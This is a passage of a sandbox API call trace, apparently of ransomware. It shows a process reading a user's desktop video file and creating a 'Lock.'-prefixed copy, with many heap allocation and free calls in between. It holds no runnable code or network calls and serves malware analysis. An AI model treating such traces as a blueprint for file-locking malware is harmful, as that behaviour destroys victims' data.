hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0161.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0161.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0161.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0161.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0161.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0161.186] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/81-stuKA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\81-stuka.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0161.186] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.186] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0161.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0161.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0161.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.187] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.187] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0161.187] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0161.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.187] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0161.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0161.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0161.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0161.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0161.188] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0161.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0161.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0161.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0161.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0161.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0161.189] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0161.189] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.81-stuKA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.81-stuka.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0161.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0161.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0161.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0161.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.190] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0161.190] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0161.190] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.190] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0161.191] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0161.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0161.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0161.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0161.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0161.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0161.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0161.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0161.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.192] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0161.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0161.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36a0020 [0161.193] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0161.193] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xdb53, lpOverlapped=0x0) returned 1 [0161.195] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0161.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0161.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0161.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xdb53) returned 0x24d7a58 [0161.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36a0020 | out: hHeap=0x25c0000) returned 1 [0161.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0161.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0161.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0161.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0161.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0161.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xdb53) returned 0x24e55b8 [0161.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0161.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.197] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xdb53) returned 0x24d7a58 [0161.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0161.197] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0161.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0161.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.198] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0161.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0161.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0161.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0161.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0161.198] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0161.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0161.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0161.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0161.198] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0161.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0161.198] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0161.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0161.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1198 [0161.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xdb53) returned 0x24d7a58 [0161.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0161.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2658 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0161.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0161.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0161.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0161.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0161.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0161.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0161.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0161.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0161.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xdb53) returned 0x34b2250 [0161.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0161.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0161.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0161.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0161.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0161.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.202] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0161.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0161.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0161.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0161.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0161.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0161.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.203] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.203] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0161.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0161.203] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0161.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 